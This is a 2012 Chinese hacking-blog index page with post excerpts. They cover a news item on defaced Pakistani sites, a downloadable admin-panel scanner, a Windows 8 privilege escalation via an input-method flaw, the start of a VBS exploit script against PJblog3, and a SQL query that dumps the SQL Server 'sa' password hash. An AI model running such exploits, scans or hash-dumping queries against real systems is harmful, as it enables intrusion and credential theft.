巴基斯坦谷歌、雅虎、苹果等大型网站遭黑客攻击

分类:新闻 | 2012-11-25 | 撸过 534 次
1人扯谈

 

巴基斯坦的许多大型企业官方网站,包括谷歌、微软、雅虎、苹果、Visa、汇丰银行、可口可乐、Blogspot、索尼、惠普、eBay、PayPal都遭到了黑客攻击。来自媒体The Hackers Media的消息,这些网站是被一个土耳其黑客组织黑的。

另有三个域名:blog.microsoft.pk、adsense.google.com.pk以及code.google.pk也遭到了一个巴基斯坦黑客团体的攻击。巴基斯坦的黑客不仅宣布了攻击这些站点的原因,而且还公布了他们所发现的这些站点本身存在的漏洞。

“我们为什么浪费时间去黑巴基斯坦的网站?我们只是想传达我们的信息,我们先前已经[......]

继续阅读

御剑后台扫描工具 珍藏版

分类:工具 | 2012-11-21 | 撸过 1,941 次
2人扯谈

 

本地:御剑后台扫描工具 珍藏版

网盘:御剑后台扫描工具 珍藏版

利用QQ拼音纯净版漏洞可提权 Windows 8

分类:安全 | 2012-11-21 | 撸过 588 次
2人扯谈

    发现这个漏洞的时候, 笔者正在机房上课。正想用3389远程桌面去控制宿舍电脑的时候,因为重做系统忘记自己的IP地址,因此就随手扫描了一下IP段开3389端口的电脑。没想到就随手扫描到一台WIN8的系统,而且这个系统还装了QQ输入法WIN8纯净版。

    当时我就想起初中时候的那个极品五笔的漏洞,就随手测试了一下,没想到在时隔7、8年后的今天,号称非常安全的WIN8系统居然还有如此大的漏洞。这边就把提权过程理一遍。
[......]

继续阅读

PJblog3漏洞利用说明

分类:安全 | 2012-11-9 | 撸过 811 次
0人扯谈

真想不明白这样的漏洞这么久了官方为什么不修复 到现在还有此类漏洞  伸直更可怕的注册会员直插一句话

工具是用VBS写的,代码如下:

If WScript.Arguments.Count <> 2 Then
WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"
WScript.Echo "Example: Cscript.exe Exp.vbs https://www.webshell.cc puterjam"
WScript.Quit
End If
attackUrl = WScript.Arguments(0)
a[......]

继续阅读

各种类型数据库抓HASH破解最高权限密码!

分类:安全 | 2012-11-5 | 撸过 1,538 次
0人扯谈

SQL Server 2000:-

SELECT password from master.dbo.sysxlogins where name='sa'

0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0×0100- constant header
34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C[......]

继续阅读